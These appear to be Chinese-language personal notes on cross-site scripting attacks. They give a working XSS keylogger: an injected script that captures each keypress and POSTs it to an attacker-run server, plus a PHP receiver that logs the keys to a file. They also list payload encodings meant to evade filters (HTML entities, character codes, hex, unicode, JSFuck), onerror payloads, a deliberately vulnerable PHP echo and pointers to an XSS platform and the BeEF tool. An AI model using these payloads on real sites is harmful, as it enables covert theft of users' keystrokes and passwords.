xss攻击

xss键盘记录

xss插入代码

<script type="text/javascript" src="./log.js"></script>

log.js

document.onkeypress=function(evt){
evt=evt ? evt : window.event;
key=String.fromCharCode(evt.keyCode ? evt.keyCode : evt.charCode);
if(key){
var http=new XMLHttpRequest();
var param=encodeURI(key);
http.open("POST","http://本地服务器IP/keylog/log.php",true);
http.setRequestHeader("Content-type","application/x-www-form-urlencoded");
http.send("key="+param);
}
}

log.php

<?php
$key=$_POST['key'];
$logfile='key.txt';
$fp=fopen($logfile,"a");
fwrite($fp,$key);
fclose($fp);
>

xss编码方式

html实体编码

HTML解析器能识别在文本里和参数或属性值里的实体编码

html属性
html事件

无法写进<script>标签内容，只能配合事件触发
<img src=x onerror=alert(1)>
十进制：&#97;&#108;&#101;
十六进制：&#x28;&#x29;

进制编码

<script>eval(String.fromCharCode())</script>
<img src=x onerror=eval(String.fromCharCode())>
十进制：97,108,22
十六进制：\x61\x6c\x65
unicode：\u0061\u006c\u0065

url编码

<?php $xss=$_GET['xss'];echo $xss;?>

jsfuck

<img src=x onerror=js编码>
<script>js编码</script>
<script>function("alert(1)")()</script>

xss平台搭建

https://woj.app/1439.html

beEF工具